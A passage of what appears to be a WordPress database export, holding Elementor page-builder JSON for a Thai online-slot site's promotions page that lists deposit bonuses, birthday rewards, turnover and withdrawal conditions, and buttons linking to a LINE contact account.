\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e41\\u0e08\\u0e49\\u0e07\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21)<\\/li><li data-start=\\\"2304\\\" data-end=\\\"2404\\\">\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e43\\u0e14\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07 \\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e46 \\u0e41\\u0e25\\u0e30 <strong data-start=\\\"2365\\\" data-end=\\\"2385\\\">\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1b\\u0e23<\\/strong> \\u0e22\\u0e01\\u0e40\\u0e27\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38\\u0e44\\u0e27\\u0e49<\\/li><li data-start=\\\"2407\\\" data-end=\\\"2499\\\">naijan <strong data-start=\\\"2414\\\" data-end=\\\"2445\\\">\\u0e02\\u0e2d\\u0e2a\\u0e07\\u0e27\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\/\\u0e22\\u0e01\\u0e40\\u0e25\\u0e34\\u0e01<\\/strong> \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e1b\\u0e0f\\u0e34\\u0e40\\u0e2a\\u0e18\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e2b\\u0e32\\u0e01\\u0e15\\u0e23\\u0e27\\u0e08\\u0e1e\\u0e1a\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\/\\u0e1c\\u0e34\\u0e14\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1310,162,'_thumbnail_id','53'),(1313,163,'_elementor_edit_mode','builder'),(1314,163,'_elementor_template_type','wp-page'),(1315,163,'_elementor_version','3.32.5'),(1316,163,'_elementor_pro_version','3.32.3'),(1317,163,'_wp_page_template','default'),(1318,163,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1319,163,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 Megabet333 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"346\\\" data-end=\\\"760\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c megabet \\u0e21\\u0e32\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e47\\u0e04\\u0e07\\u0e2b\\u0e19\\u0e35\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e49\\u0e19 \\u201c<strong>\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong>\\u201d \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e1b\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e01\\u0e31\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e36\\u0e07\\u0e41\\u0e02\\u0e48\\u0e07\\u0e02\\u0e31\\u0e19\\u0e01\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e14\\u0e47\\u0e14 \\u0e46 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e2d\\u0e32\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e16\\u0e49\\u0e32\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e04\\u0e22 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e43\\u0e19\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 \\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e16\\u0e2d\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e16\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a08 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a07 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49fe62a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4dc04\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"4e0d99f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e21\\u0e1a\\u0e31\\u0e2a 100%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"20cbe32\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"696\\\" data-end=\\\"711\\\">\\u0e04\\u0e38\\u0e49\\u0e21\\u0e2a\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e49\\u0e07<\\/strong> \\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/p><ul><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"743\\\" data-end=\\\"758\\\">100 \\u0e23\\u0e31\\u0e1a 200<\\/strong><\\/li><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"763\\\" data-end=\\\"780\\\">500 \\u0e23\\u0e31\\u0e1a 1,000<\\/strong><\\/li><\\/ul><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"798\\\" data-end=\\\"813\\\">\\u0e17\\u0e33 6 \\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>, <strong data-start=\\\"815\\\" data-end=\\\"835\\\">\\u0e16\\u0e2d\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"848\\\" data-end=\\\"886\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e15\\u0e31\\u0e14\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 (\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a)<\\/strong> \\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e14\\u0e22\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e16\\u0e2d\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c <strong data-start=\\\"945\\\" data-end=\\\"967\\\">1 \\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\/\\u0e27\\u0e31\\u0e19\\/\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"82869dd\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"174fb16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"ae3dca7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy Birthday Bonus \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d7acfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\ud83c\\udf81 \\u0e09\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 \\u0e23\\u0e31\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e27\\u0e31\\u0e0d\\u0e15\\u0e32\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e19\\u0e31\\u0e49\\u0e19 <br \\/>(\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14)<\\/p><ul><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1480\\\" data-end=\\\"1496\\\">3,000 \\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b<\\/strong> \\u2192 <strong data-start=\\\"1499\\\" data-end=\\\"1513\\\">\\u0e23\\u0e31\\u0e1a\\u0e1f\\u0e23\\u0e35 300<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1529\\\" data-end=\\\"1542\\\">500\\u20132,999<\\/strong> \\u2192 <strong data-start=\\\"1545\\\" data-end=\\\"1555\\\">\\u0e23\\u0e31\\u0e1a 50<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1571\\\" data-end=\\\"1586\\\">\\u0e44\\u0e21\\u0e48\\u0e40\\u0e01\\u0e34\\u0e19 500<\\/strong> \\u2192 <strong 